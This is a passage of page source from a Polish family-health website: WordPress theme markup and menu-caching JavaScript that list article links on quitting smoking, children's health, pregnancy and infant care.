<\/div><\/div>","td_block_id":"td_uid_10_5c5e20b787cdf","td_hide_prev":true,"td_hide_next":false}));
                                                    tmpObj = JSON.parse(JSON.stringify(block_td_uid_10_5c5e20b787cdf));
                            tmpObj.is_ajax_running = true;
                            tmpObj.td_current_page = 1;
                            tmpObj.td_filter_value = 59;
                            var currentBlockObjSignature = JSON.stringify(tmpObj);
                            tdLocalCache.set(currentBlockObjSignature, JSON.stringify({"td_data":"<div class=\"td-mega-row\"><div class=\"td-mega-span\">\r\n        <div class=\"td_module_mega_menu\">\r\n            <div class=\"td-module-image\">\r\n                <div class=\"td-module-thumb\"><a href=\"http:\/\/www.erodzina.com\/uzaleznienie-od-nikotyny\/\" rel=\"bookmark\" title=\"Uzale\u017cnienie od nikotyny\"><img width=\"260\" height=\"168\" class=\"entry-thumb\" src=\"http:\/\/www.erodzina.com\/wp-content\/uploads\/2015\/06\/cigarette-666939_640.jpg\" srcset=\"http:\/\/www.erodzina.com\/wp-content\/uploads\/2015\/06\/cigarette-666939_640.jpg 640w, http:\/\/www.erodzina.com\/wp-content\/uploads\/2015\/06\/cigarette-666939_640-300x194.jpg 300w\" sizes=\"(max-width: 260px) 100vw, 260px\" alt=\"\" title=\"Uzale\u017cnienie od nikotyny\"\/><\/a><\/div>                <div class=\"td-post-category-wrap\"><a href=\"http:\/\/www.erodzina.com\/kategoria\/zdrowie-i-opieka\/rzuc-palenie\/\" class=\"td-post-category\">Rzu\u0107 palenie<\/a><\/div>\r\n            <\/div>\r\n\r\n            <div class=\"td-item-details\">\r\n                <h3 class=\"entry-title td-module-title\"><a href=\"http:\/\/www.erodzina.com\/uzaleznienie-od-nikotyny\/\" rel=\"bookmark\" title=\"Uzale\u017cnienie od nikotyny\">Uzale\u017cnienie od nikotyny<\/a><\/h3>                <span class=\"td-post-date\"><time class=\"entry-date updated td-module-date\" datetime=\"2015-06-01T13:03:48+00:00\" >1 czerwca 2015<\/time><\/span>            <\/div>\r\n        <\/div>\r\n        <\/div><div class=\"td-mega-span\">\r\n        <div class=\"td_module_mega_menu\">\r\n            <div class=\"td-module-image\">\r\n                <div class=\"td-module-thumb\"><a href=\"http:\/\/www.erodzina.com\/skutki-dlugoletniego-palenia\/\" rel=\"bookmark\" title=\"Skutki d\u0142ugoletniego palenia\"><img width=\"260\" height=\"195\" class=\"entry-thumb\" src=\"http:\/\/www.erodzina.com\/wp-content\/themes\/ionMag\/images\/no-thumb\/td_260x195.png\" alt=\"\"\/><\/a><\/div>                <div class=\"td-post-category-wrap\"><a href=\"http:\/\/www.erodzina.com\/kategoria\/zdrowie-i-opieka\/rzuc-palenie\/\" class=\"td-post-category\">Rzu\u0107 palenie<\/a><\/div>\r\n            <\/div>\r\n\r\n            <div class=\"td-item-details\">\r\n                <h3 class=\"entry-title td-module-title\"><a href=\"http:\/\/www.erodzina.com\/skutki-dlugoletniego-palenia\/\" rel=\"bookmark\" title=\"Skutki d\u0142ugoletniego palenia\">Skutki d\u0142ugoletniego palenia<\/a><\/h3>                <span class=\"td-post-date\"><time class=\"entry-date updated td-module-date\" datetime=\"2013-04-22T18:22:41+00:00\" >22 kwietnia 2013<\/time><\/span>            <\/div>\r\n        <\/div>\r\n        <\/div><div class=\"td-mega-span\">\r\n        <div class=\"td_module_mega_menu\">\r\n            <div class=\"td-module-image\">\r\n                <div class=\"td-module-thumb\"><a href=\"http:\/\/www.erodzina.com\/smoz-papieros-bez-dymu\/\" rel=\"bookmark\" title=\"Smoz papieros bez dymu\"><img width=\"260\" height=\"195\" class=\"entry-thumb\" src=\"http:\/\/www.erodzina.com\/wp-content\/themes\/ionMag\/images\/no-thumb\/td_260x195.png\" alt=\"\"\/><\/a><\/div>                <div class=\"td-post-category-wrap\"><a href=\"http:\/\/www.erodzina.com\/kategoria\/zdrowie-i-opieka\/rzuc-palenie\/\" class=\"td-post-category\">Rzu\u0107 palenie<\/a><\/div>\r\n            <\/div>\r\n\r\n            <div class=\"td-item-details\">\r\n                <h3 class=\"entry-title td-module-title\"><a href=\"http:\/\/www.erodzina.com\/smoz-papieros-bez-dymu\/\" rel=\"bookmark\" title=\"Smoz papieros bez dymu\">Smoz papieros bez dymu<\/a><\/h3>                <span class=\"td-post-date\"><time class=\"entry-date updated td-module-date\" datetime=\"2008-04-29T00:00:34+00:00\" >29 kwietnia 2008<\/time><\/span>            <\/div>\r\n        <\/div>\r\n        <\/div><\/div>","td_block_id":"td_uid_10_5c5e20b787cdf","td_hide_prev":true,"td_hide_next":false}));
                                    </script>
            <div class="td-container td_block_wrap td_block_mega_menu td_uid_10_5c5e20b787cdf_rand td_with_ajax_pagination td-pb-border-top td_block_template_1" data-td-block-uid="td_uid_10_5c5e20b787cdf"><div class="td_mega_menu_sub_cats"><div class="block-mega-child-cats"><a class="mega-menu-sub-cat-td_uid_10_5c5e20b787cdf" id="td_uid_11_5c5e20b78817c" data-td_block_id="td_uid_10_5c5e20b787cdf" data-td_filter_value="52" href="http://www.erodzina.com/kategoria/zdrowie-i-opieka/antykoncepcja/">Antykoncepcja</a><a class="mega-menu-sub-cat-td_uid_10_5c5e20b787cdf" id="td_uid_12_5c5e20b7881ac" data-td_block_id="td_uid_10_5c5e20b787cdf" data-td_filter_value="17" href="http://www.erodzina.com/kategoria/zdrowie-i-opieka/choroby-dzieciece/">Choroby dziecięce</a><a class="mega-menu-sub-cat-td_uid_10_5c5e20b787cdf" id="td_uid_13_5c5e20b7881d4" data-td_block_id="td_uid_10_5c5e20b787cdf" data-td_filter_value="58" href="http://www.erodzina.com/kategoria/zdrowie-i-opieka/cukrzyca/">Cukrzyca</a><a class="mega-menu-sub-cat-td_uid_10_5c5e20b787cdf" id="td_uid_14_5c5e20b7881f9" data-td_block_id="td_uid_10_5c5e20b787cdf" data-td_filter_value="20" href="http://www.erodzina.com/kategoria/zdrowie-i-opieka/domowa-apteczka/">Domowa apteczka</a><a class="mega-menu-sub-cat-td_uid_10_5c5e20b787cdf" id="td_uid_15_5c5e20b78821d" data-td_block_id="td_uid_10_5c5e20b787cdf" data-td_filter_value="98" href="http://www.erodzina.com/kategoria/zdrowie-i-opieka/medycyna-alternatywna/">Medycyna alternatywna</a><a class="mega-menu-sub-cat-td_uid_10_5c5e20b787cdf" id="td_uid_16_5c5e20b788240" data-td_block_id="td_uid_10_5c5e20b787cdf" data-td_filter_value="23" href="http://www.erodzina.com/kategoria/zdrowie-i-opieka/rak/">Rak</a><a class="mega-menu-sub-cat-td_uid_10_5c5e20b787cdf" id="td_uid_17_5c5e20b788264" data-td_block_id="td_uid_10_5c5e20b787cdf" data-td_filter_value="59" href="http://www.erodzina.com/kategoria/zdrowie-i-opieka/rzuc-palenie/">Rzuć palenie</a><a class="mega-menu-sub-cat-td_uid_10_5c5e20b787cdf" id="td_uid_18_5c5e20b788287" data-td_block_id="td_uid_10_5c5e20b787cdf" data-td_filter_value="21" href="http://www.erodzina.com/kategoria/zdrowie-i-opieka/wady-sluchu/">Wady słuchu</a><a class="mega-menu-sub-cat-td_uid_10_5c5e20b787cdf" id="td_uid_19_5c5e20b7882ab" data-td_block_id="td_uid_10_5c5e20b787cdf" data-td_filter_value="61" href="http://www.erodzina.com/kategoria/zdrowie-i-opieka/zdrowe-nogi/">Zdrowe nogi</a><a class="mega-menu-sub-cat-td_uid_10_5c5e20b787cdf" id="td_uid_20_5c5e20b7882cd" data-td_block_id="td_uid_10_5c5e20b787cdf" data-td_filter_value="16" href="http://www.erodzina.com/kategoria/zdrowie-i-opieka/zdrowie-dziecka/">Zdrowie dziecka</a><a class="mega-menu-sub-cat-td_uid_10_5c5e20b787cdf" id="td_uid_21_5c5e20b7882f0" data-td_block_id="td_uid_10_5c5e20b787cdf" data-td_filter_value="2" href="http://www.erodzina.com/kategoria/zdrowie-i-opieka/zdrowie-kobiety/">Zdrowie kobiety</a><a class="mega-menu-sub-cat-td_uid_10_5c5e20b787cdf" id="td_uid_22_5c5e20b788312" data-td_block_id="td_uid_10_5c5e20b787cdf" data-td_filter_value="15" href="http://www.erodzina.com/kategoria/zdrowie-i-opieka/zdrowie-mezczyzny/">Zdrowie mężczyzny</a><a class="mega-menu-sub-cat-td_uid_10_5c5e20b787cdf" id="td_uid_23_5c5e20b788336" data-td_block_id="td_uid_10_5c5e20b787cdf" data-td_filter_value="18" href="http://www.erodzina.com/kategoria/zdrowie-i-opieka/zdrowie-rodziny/">Zdrowie rodziny</a><a class="cur-sub-cat mega-menu-sub-cat-td_uid_10_5c5e20b787cdf mega-menu-cat-all" id="td_uid_24_5c5e20b788358" data-td_block_id="td_uid_10_5c5e20b787cdf" data-td_filter_value="" href="http://www.erodzina.com/kategoria/zdrowie-i-opieka/">Wszystko Zdrowie i Opieka</a></div></div><div id="td_uid_10_5c5e20b787cdf" class="td_block_inner"><div class="td-mega-row"><div class="td-mega-span">
        <div class="td_module_mega_menu">
            <div class="td-module-image">
                <div class="td-module-thumb"><a href="http://www.erodzina.com/pneumokoki-jak-chronic-swoje-dziecko-przed-zakazeniem/" rel="bookmark" title="Pneumokoki – jak chronić swoje dziecko przed zakażeniem?"><img width="260" height="195" class="entry-thumb" src="http://www.erodzina.com/wp-content/uploads/2019/01/stethoscope-1584223_1920-260x195.jpg" srcset="http://www.erodzina.com/wp-content/uploads/2019/01/stethoscope-1584223_1920-260x195.jpg 260w, http://www.erodzina.com/wp-content/uploads/2019/01/stethoscope-1584223_1920-300x225.jpg 300w, http://www.erodzina.com/wp-content/uploads/2019/01/stethoscope-1584223_1920-768x576.jpg 768w, http://www.erodzina.com/wp-content/uploads/2019/01/stethoscope-1584223_1920-1024x768.jpg 1024w, http://www.erodzina.com/wp-content/uploads/2019/01/stethoscope-1584223_1920-80x60.jpg 80w, http://www.erodzina.com/wp-content/uploads/2019/01/stethoscope-1584223_1920-245x184.jpg 245w, http://www.erodzina.com/wp-content/uploads/2019/01/stethoscope-1584223_1920-640x480.jpg 640w, http://www.erodzina.com/wp-content/uploads/2019/01/stethoscope-1584223_1920-980x735.jpg 980w" sizes="(max-width: 260px) 100vw, 260px" alt="" title="Pneumokoki – jak chronić swoje dziecko przed zakażeniem?"></a></div>                <div class="td-post-category-wrap"><a href="http://www.erodzina.com/kategoria/zdrowie-i-opieka/zdrowie-dziecka/" class="td-post-category">Zdrowie dziecka</a></div>
            </div>

            <div class="td-item-details">
                <h3 class="entry-title td-module-title"><a href="http://www.erodzina.com/pneumokoki-jak-chronic-swoje-dziecko-przed-zakazeniem/" rel="bookmark" title="Pneumokoki – jak chronić swoje dziecko przed zakażeniem?">Pneumokoki – jak chronić swoje dziecko przed zakażeniem?</a></h3>                <span class="td-post-date"><time class="entry-date updated td-module-date" datetime="2019-01-31T14:00:37+00:00">31 stycznia 2019</time></span>            </div>
        </div>
        </div><div class="td-mega-span">
        <div class="td_module_mega_menu">
            <div class="td-module-image">
                <div class="td-module-thumb"><a href="http://www.erodzina.com/co-wybrac-na-grype-ibuprofen-czy-paracetamol/" rel="bookmark" title="Co wybrać na grypę – ibuprofen czy paracetamol?"><img width="260" height="195" class="entry-thumb" src="http://www.erodzina.com/wp-content/uploads/2019/01/bad6e7a94675118df6441cbe1953c87f-260x195.jpg" srcset="http://www.erodzina.com/wp-content/uploads/2019/01/bad6e7a94675118df6441cbe1953c87f-260x195.jpg 260w, http://www.erodzina.com/wp-content/uploads/2019/01/bad6e7a94675118df6441cbe1953c87f-80x60.jpg 80w, http://www.erodzina.com/wp-content/uploads/2019/01/bad6e7a94675118df6441cbe1953c87f-245x184.jpg 245w" sizes="(max-width: 260px) 100vw, 260px" alt="" title="Co wybrać na grypę – ibuprofen czy paracetamol?"></a></div>                <div class="td-post-category-wrap"><a href="http://www.erodzina.com/kategoria/zdrowie-i-opieka/zdrowie-rodziny/" class="td-post-category">Zdrowie rodziny</a></div>
            </div>

            <div class="td-item-details">
                <h3 class="entry-title td-module-title"><a href="http://www.erodzina.com/co-wybrac-na-grype-ibuprofen-czy-paracetamol/" rel="bookmark" title="Co wybrać na grypę – ibuprofen czy paracetamol?">Co wybrać na grypę – ibuprofen czy paracetamol?</a></h3>                <span class="td-post-date"><time class="entry-date updated td-module-date" datetime="2019-01-03T11:55:57+00:00">3 stycznia 2019</time></span>            </div>
        </div>
        </div><div class="td-mega-span">
        <div class="td_module_mega_menu">
            <div class="td-module-image">
                <div class="td-module-thumb"><a href="http://www.erodzina.com/fundacja-dla-dzieci-chorych-na-nowotwor-do-ktorej-sie-zwrocic/" rel="bookmark" title="Fundacja dla dzieci chorych na nowotwór. Do której się zwrócić?"><img width="260" height="195" class="entry-thumb" src="http://www.erodzina.com/wp-content/uploads/2018/12/walka_z_rakiem-260x195.jpg" srcset="http://www.erodzina.com/wp-content/uploads/2018/12/walka_z_rakiem-260x195.jpg 260w, http://www.erodzina.com/wp-content/uploads/2018/12/walka_z_rakiem-80x60.jpg 80w, http://www.erodzina.com/wp-content/uploads/2018/12/walka_z_rakiem-245x184.jpg 245w" sizes="(max-width: 260px) 100vw, 260px" alt="" title="Fundacja dla dzieci chorych na nowotwór. Do której się zwrócić?"></a></div>                <div class="td-post-category-wrap"><a href="http://www.erodzina.com/kategoria/zdrowie-i-opieka/rak/" class="td-post-category">Rak</a></div>
            </div>

            <div class="td-item-details">
                <h3 class="entry-title td-module-title"><a href="http://www.erodzina.com/fundacja-dla-dzieci-chorych-na-nowotwor-do-ktorej-sie-zwrocic/" rel="bookmark" title="Fundacja dla dzieci chorych na nowotwór. Do której się zwrócić?">Fundacja dla dzieci chorych na nowotwór. Do której się zwrócić?</a></h3>                <span class="td-post-date"><time class="entry-date updated td-module-date" datetime="2018-12-13T19:55:22+00:00">13 grudnia 2018</time></span>            </div>
        </div>
        </div></div></div><div class="td-next-prev-wrap"><a href="#" class="td-ajax-prev-page ajax-page-disabled" id="prev-page-td_uid_10_5c5e20b787cdf" data-td_block_id="td_uid_10_5c5e20b787cdf"><i class="td-icon-font td-icon-menu-left"></i></a><a href="#" class="td-ajax-next-page" id="next-page-td_uid_10_5c5e20b787cdf" data-td_block_id="td_uid_10_5c5e20b787cdf"><i class="td-icon-font td-icon-menu-right"></i></a></div><div class="clearfix"></div></div> <!-- ./block1 --></div></div></li>
</ul>
</li>
<li class="menu-item menu-item-type-taxonomy menu-item-object-category td-menu-item td-mega-menu menu-item-5100"><a href="http://www.erodzina.com/kategoria/ciaza-i-porod/" class="sf-with-ul">Ciąża<i class="td-icon-menu-down"></i></a>
<ul class="sub-menu" style="display: none; float: none; width: 20em;">
	<li class="menu-item-0" style="white-space: normal; float: left; width: 100%;"><div class="td-container-border"><div class="td-mega-grid"><script>var block_td_uid_25_5c5e20b78d5c3 = new tdBlock();
block_td_uid_25_5c5e20b78d5c3.id = "td_uid_25_5c5e20b78d5c3";
block_td_uid_25_5c5e20b78d5c3.atts = '{"limit":3,"sort":"","post_ids":"","tag_slug":"","autors_id":"","installed_post_types":"","category_id":"7","category_ids":"","custom_title":"","custom_url":"","show_child_cat":30,"sub_cat_ajax":"","ajax_pagination":"next_prev","header_color":"","header_text_color":"","ajax_pagination_infinite_stop":"","td_column_number":3,"td_ajax_preloading":"preload","td_ajax_filter_type":"td_category_ids_filter","td_ajax_filter_ids":"","td_filter_default_txt":"Wszystko","color_preset":"","border_top":"","class":"td_uid_25_5c5e20b78d5c3_rand","el_class":"","offset":"","css":"","tdc_css":"","tdc_css_class":"td_uid_25_5c5e20b78d5c3_rand","tdc_css_class_style":"td_uid_25_5c5e20b78d5c3_rand_style","live_filter":"","live_filter_cur_post_id":"","live_filter_cur_post_author":"","block_template_id":""}';
block_td_uid_25_5c5e20b78d5c3.td_column_number = "3";
block_td_uid_25_5c5e20b78d5c3.block_type = "td_block_mega_menu";
block_td_uid_25_5c5e20b78d5c3.post_count = "3";
block_td_uid_25_5c5e20b78d5c3.found_posts = "256";
block_td_uid_25_5c5e20b78d5c3.header_color = "";
block_td_uid_25_5c5e20b78d5c3.ajax_pagination_infinite_stop = "";
block_td_uid_25_5c5e20b78d5c3.max_num_pages = "86";
tdBlocksArray.push(block_td_uid_25_5c5e20b78d5c3);
</script>            <script>
                var tmpObj = JSON.parse(JSON.stringify(block_td_uid_25_5c5e20b78d5c3));
                tmpObj.is_ajax_running = true;
                var currentBlockObjSignature = JSON.stringify(tmpObj);
                tdLocalCache.set(currentBlockObjSignature, JSON.stringify({"td_data":"<div class=\"td-mega-row\"><div class=\"td-mega-span\">\r\n        <div class=\"td_module_mega_menu\">\r\n            <div class=\"td-module-image\">\r\n                <div class=\"td-module-thumb\"><a href=\"http:\/\/www.erodzina.com\/zdrowe-kaszki-dla-niemowlat-takze-dla-alergikow\/\" rel=\"bookmark\" title=\"Zdrowe kaszki dla niemowl\u0105t tak\u017ce dla alergik\u00f3w\"><img width=\"260\" height=\"195\" class=\"entry-thumb\" src=\"http:\/\/www.erodzina.com\/wp-content\/uploads\/2019\/02\/9e7ae08563048ee9b9ae9085db55b3a6-260x195.jpg\" srcset=\"http:\/\/www.erodzina.com\/wp-content\/uploads\/2019\/02\/9e7ae08563048ee9b9ae9085db55b3a6-260x195.jpg 260w, http:\/\/www.erodzina.com\/wp-content\/uploads\/2019\/02\/9e7ae08563048ee9b9ae9085db55b3a6-80x60.jpg 80w, http:\/\/www.erodzina.com\/wp-content\/uploads\/2019\/02\/9e7ae08563048ee9b9ae9085db55b3a6-245x184.jpg 245w\" sizes=\"(max-width: 260px) 100vw, 260px\" alt=\"\" title=\"Zdrowe kaszki dla niemowl\u0105t tak\u017ce dla alergik\u00f3w\"\/><\/a><\/div>                <div class=\"td-post-category-wrap\"><a href=\"http:\/\/www.erodzina.com\/kategoria\/ciaza-i-porod\/karmienie\/\" class=\"td-post-category\">Karmienie<\/a><\/div>\r\n            <\/div>\r\n\r\n            <div class=\"td-item-details\">\r\n                <h3 class=\"entry-title td-module-title\"><a href=\"http:\/\/www.erodzina.com\/zdrowe-kaszki-dla-niemowlat-takze-dla-alergikow\/\" rel=\"bookmark\" title=\"Zdrowe kaszki dla niemowl\u0105t tak\u017ce dla alergik\u00f3w\">Zdrowe kaszki dla niemowl\u0105t tak\u017ce dla alergik\u00f3w<\/a><\/h3>                <span class=\"td-post-date\"><time class=\"entry-date updated td-module-date\" datetime=\"2019-02-04T16:05:44+00:00\" >4 lutego 2019<\/time><\/span>            <\/div>\r\n        <\/div>\r\n        <\/div><div class=\"td-mega-span\">\r\n        <div class=\"td_module_mega_menu\">\r\n            <div class=\"td-module-image\">\r\n                <div class=\"td-module-thumb\"><a href=\"http:\/\/www.erodzina.com\/czy-i-kiedy-uzywac-poduszki-klin-dla-niemowlaka-i-dzieciaka\/\" rel=\"bookmark\" title=\"Czy i kiedy u\u017cywa\u0107 poduszki klin dla niemowlaka i dzieciaka?\"><img width=\"260\" height=\"195\" class=\"entry-thumb\" src=\"http:\/\/www.erodzina.com\/wp-content\/uploads\/2019\/01\/brothers-457237_1280-260x195.jpg\" srcset=\"http:\/\/www.erodzina.com\/wp-content\/uploads\/2019\/01\/brothers-457237_1280-260x195.jpg 260w, http:\/\/www.erodzina.com\/wp-content\/uploads\/2019\/01\/brothers-457237_1280-80x60.jpg 80w, http:\/\/www.erodzina.com\/wp-content\/uploads\/2019\/01\/brothers-457237_1280-245x184.jpg 245w\" sizes=\"(max-width: 260px) 100vw, 260px\" alt=\"\" title=\"Czy i kiedy u\u017cywa\u0107 poduszki klin dla niemowlaka i dzieciaka?\"\/><\/a><\/div>                <div class=\"td-post-category-wrap\"><a href=\"http:\/\/www.erodzina.com\/kategoria\/ciaza-i-porod\/niemowleta\/\" class=\"td-post-category\">Niemowl\u0119ta<\/a><\/div>\r\n            <\/div>\r\n\r\n            <div class=\"td-item-details\">\r\n                <h3 class=\"entry-title td-module-title\"><a href=\"http:\/\/www.erodzina.com\/czy-i-kiedy-uzywac-poduszki-klin-dla-niemowlaka-i-dzieciaka\/\" rel=\"bookmark\" title=\"Czy i kiedy u\u017cywa\u0107 poduszki klin dla niemowlaka i dzieciaka?\">Czy i kiedy u\u017cywa\u0107 poduszki klin dla niemowlaka i dzieciaka?<\/a><\/h3>                <span class=\"td-post-date\"><time class=\"entry-date updated td-module-date\" datetime=\"2019-01-09T19:13:29+00:00\" >9 stycznia 2019<\/time><\/span>            <\/div>\r\n        <\/div>\r\n        <\/div><div class=\"td-mega-span\">\r\n        <div class=\"td_module_mega_menu\">\r\n            <div class=\"td-module-image\">\r\n                <div class=\"td-module-thumb\"><a href=\"http:\/\/www.erodzina.com\/akcesoria-niezbedne-w-wyprawce-dla-niemowlaka\/\" rel=\"bookmark\" title=\"Akcesoria niezb\u0119dne w wyprawce dla niemowlaka\"><img width=\"260\" height=\"195\" class=\"entry-thumb\" src=\"http:\/\/www.erodzina.com\/wp-content\/uploads\/2019\/01\/dziecko-260x195.jpeg\" srcset=\"http:\/\/www.erodzina.com\/wp-content\/uploads\/2019\/01\/dziecko-260x195.jpeg 260w, http:\/\/www.erodzina.com\/wp-content\/uploads\/2019\/01\/dziecko-80x60.jpeg 80w, http:\/\/www.erodzina.com\/wp-content\/uploads\/2019\/01\/dziecko-245x184.jpeg 245w\" sizes=\"(max-width: 260px) 100vw, 260px\" alt=\"\" title=\"Akcesoria niezb\u0119dne w wyprawce dla niemowlaka\"\/><\/a><\/div>                <div class=\"td-post-category-wrap\"><a href=\"http:\/\/www.erodzina.com\/kategoria\/ciaza-i-porod\/niemowleta\/\" class=\"td-post-category\">Niemowl\u0119ta<\/a><\/div>\r\n            <\/div>\r\n\r\n            <div class=\"td-item-details\">\r\n                <h3 class=\"entry-title td-module-title\"><a href=\"http:\/\/www.erodzina.com\/akcesoria-niezbedne-w-wyprawce-dla-niemowlaka\/\" rel=\"bookmark\" title=\"Akcesoria niezb\u0119dne w wyprawce dla niemowlaka\">Akcesoria niezb\u0119dne w wyprawce dla niemowlaka<\/a><\/h3>                <span class=\"td-post-date\"><time class=\"entry-date updated td-module-date\" datetime=\"2019-01-03T11:59:38+00:00\" >3 stycznia 2019<\/time><\/span>            <\/div>\r\n        <\/div>\r\n        <\/div><\/div>","td_block_id":"td_uid_25_5c5e20b78d5c3","td_hide_prev":true,"td_hide_next":false}));
                                            tmpObj = JSON.parse(JSON.stringify(block_td_uid_25_5c5e20b78d5c3));
                            tmpObj.is_ajax_running = true;
                            tmpObj.td_current_page = 1;
                            tmpObj.td_filter_value = 31;
                            var currentBlockObjSignature = JSON.stringify(tmpObj);
                            tdLocalCache.set(currentBlockObjSignature, JSON.stringify({"td_data":"<div class=\"td-mega-row\"><div class=\"td-mega-span\">\r\n        <div class=\"td_module_mega_menu\">\r\n            <div class=\"td-module-image\">\r\n                <div class=\"td-module-thumb\"><a href=\"http:\/\/www.erodzina.com\/jak-wspierac-uklad-odpornosciowy-dziecka-od-jego-narodzin\/\" rel=\"bookmark\" title=\"Jak wspiera\u0107 uk\u0142ad odporno\u015bciowy dziecka od jego narodzin?\"><img width=\"260\" height=\"195\" class=\"entry-thumb\" src=\"http:\/\/www.erodzina.com\/wp-content\/uploads\/2018\/06\/stopki-niemowlaka-wspieranie-odpornosci-260x195.jpg\" srcset=\"http:\/\/www.erodzina.com\/wp-content\/uploads\/2018\/06\/stopki-niemowlaka-wspieranie-odpornosci-260x195.jpg 260w, http:\/\/www.erodzina.com\/wp-content\/uploads\/2018\/06\/stopki-niemowlaka-wspieranie-odpornosci-80x60.jpg 80w, http:\/\/www.erodzina.com\/wp-content\/uploads\/2018\/06\/stopki-niemowlaka-wspieranie-odpornosci-245x184.jpg 245w\" sizes=\"(max-width: 260px) 100vw, 260px\" alt=\"\" title=\"Jak wspiera\u0107 uk\u0142ad odporno\u015bciowy dziecka od jego narodzin?\"\/><\/a><\/div>                <div class=\"td-post-category-wrap\"><a href=\"http:\/\/www.erodzina.com\/kategoria\/ciaza-i-porod\/ciaza\/\" class=\"td-post-category\">Ci\u0105\u017ca<\/a><\/div>\r\n            <\/div>\r\n\r\n            <div class=\"td-item-details\">\r\n                <h3 class=\"entry-title td-module-title\"><a href=\"http:\/\/www.erodzina.com\/jak-wspierac-uklad-odpornosciowy-dziecka-od-jego-narodzin\/\" rel=\"bookmark\" title=\"Jak wspiera\u0107 uk\u0142ad odporno\u015bciowy dziecka od jego narodzin?\">Jak wspiera\u0107 uk\u0142ad odporno\u015bciowy dziecka od jego narodzin?<\/a><\/h3>                <span class=\"td-post-date\"><time class=\"entry-date updated td-module-date\" datetime=\"2018-06-25T19:08:38+00:00\" >25 czerwca 2018<\/time><\/span>            <\/div>\r\n        <\/div>\r\n        <\/div><div class=\"td-mega-span\">\r\n        <div class=\"td_module_mega_menu\">\r\n            <div class=\"td-module-image\">\r\n                <div class=\"td-module-thumb\"><a href=\"http:\/\/www.erodzina.com\/1-miesiac-ciazy-zmiany-fizjologiczne-w-organizmie-kobiety\/\" rel=\"bookmark\" title=\"1 miesi\u0105c ci\u0105\u017cy &#8211; zmiany fizjologiczne w organizmie kobiety\"><img width=\"260\" height=\"195\" class=\"entry-thumb\" src=\"http:\/\/www.erodzina.com\/wp-content\/uploads\/2018\/05\/erodzina-com-pierwszy-miesiac-ciazy-260x195.jpg\" srcset=\"http:\/\/www.erodzina.com\/wp-content\/uploads\/2018\/05\/erodzina-com-pierwszy-miesiac-ciazy-260x195.jpg 260w, http:\/\/www.erodzina.com\/wp-content\/uploads\/2018\/05\/erodzina-com-pierwszy-miesiac-ciazy-80x60.jpg 80w, http:\/\/www.erodzina.com\/wp-content\/uploads\/2018\/05\/erodzina-com-pierwszy-miesiac-ciazy-245x184.jpg 245w\" sizes=\"(max-width: 260px) 100vw, 260px\" alt=\"\" title=\"1 miesi\u0105c ci\u0105\u017cy &#8211; zmiany fizjologiczne w organizmie kobiety\"\/><\/a><\/div>                <div class=\"td-post-category-wrap\"><a href=\"http:\/\/www.erodzina.com\/kategoria\/ciaza-i-porod\/ciaza\/\" class=\"td-post-category\">Ci\u0105\u017ca<\/a><\/div>\r\n            <\/div>\r\n\r\n            <div class=\"td-item-details\">\r\n                <h3 class=\"entry-title td-module-title\"><a href=\"http:\/\/www.erodzina.com\/1-miesiac-ciazy-zmiany-fizjologiczne-w-organizmie-kobiety\/\" rel=\"bookmark\" title=\"1 miesi\u0105c ci\u0105\u017cy &#8211; zmiany fizjologiczne w organizmie kobiety\">1 miesi\u0105c ci\u0105\u017cy &#8211; zmiany fizjologiczne w organizmie kobiety<\/a><\/h3>                <span class=\"td-post-date\"><time class=\"entry-date updated td-module-date\" datetime=\"2018-05-17T20:03:29+00:00\" >17 maja 2018<\/time><\/span>            <\/div>\r\n        <\/div>\r\n        <\/div><div class=\"td-mega-span\">\r\n        <div class=\"td_module_mega_menu\">\r\n            <div class=\"td-module-image\">\r\n                <div class=\"td-module-thumb\"><a href=\"http:\/\/www.erodzina.com\/ubrania-ciazowe-w-jakie-warto-wyposazyc-swoja-szafe-podczas-wielkiego-oczekiwania\/\" rel=\"bookmark\" title=\"Ubrania ci\u0105\u017cowe \u2013 w jakie warto wyposa\u017cy\u0107 swoj\u0105 szaf\u0119 podczas wielkiego oczekiwania?\"><img width=\"260\" height=\"195\" class=\"entry-thumb\" src=\"http:\/\/www.erodzina.com\/wp-content\/uploads\/2018\/03\/kobieta-w-koszulce-ciazowej-260x195.jpg\" srcset=\"http:\/\/www.erodzina.com\/wp-content\/uploads\/2018\/03\/kobieta-w-koszulce-ciazowej-260x195.jpg 260w, http:\/\/www.erodzina.com\/wp-content\/uploads\/2018\/03\/kobieta-w-koszulce-ciazowej-80x60.jpg 80w, http:\/\/www.erodzina.com\/wp-content\/uploads\/2018\/03\/kobieta-w-koszulce-ciazowej-245x184.jpg 245w\" sizes=\"(max-width: 260px) 100vw, 260px\" alt=\"\" title=\"Ubrania ci\u0105\u017cowe \u2013 w jakie warto wyposa\u017cy\u0107 swoj\u0105 szaf\u0119 podczas wielkiego oczekiwania?\"\/><\/a><\/div>                <div class=\"td-post-category-wrap\"><a href=\"http:\/\/www.erodzina.com\/kategoria\/ciaza-i-porod\/ciaza\/\" class=\"td-post-category\">Ci\u0105\u017ca<\/a><\/div>\r\n            <\/div>\r\n\r\n            <div class=\"td-item-details\">\r\n                <h3 class=\"entry-title td-module-title\"><a href=\"http:\/\/www.erodzina.com\/ubrania-ciazowe-w-jakie-warto-wyposazyc-swoja-szafe-podczas-wielkiego-oczekiwania\/\" rel=\"bookmark\" title=\"Ubrania ci\u0105\u017cowe \u2013 w jakie warto wyposa\u017cy\u0107 swoj\u0105 szaf\u0119 podczas wielkiego oczekiwania?\">Ubrania ci\u0105\u017cowe \u2013 w jakie warto wyposa\u017cy\u0107 swoj\u0105 szaf\u0119 podczas wielkiego...<\/a><\/h3>                <span class=\"td-post-date\"><time class=\"entry-date updated td-module-date\" datetime=\"2018-03-28T16:33:28+00:00\" >28 marca 2018<\/time><\/span>            <\/div>\r\n        <\/div>\r\n        <\/div><\/div>","td_block_id":"td_uid_25_5c5e20b78d5c3","td_hide_prev":true,"td_hide_next":false}));
                                                    tmpObj = JSON.parse(JSON.stringify(block_td_uid_25_5c5e20b78d5c3));
                            tmpObj.is_ajax_running = true;
                            tmpObj.td_current_page = 1;
                            tmpObj.td_filter_value = 33;
                            var currentBlockObjSignature = JSON.stringify(tmpObj);
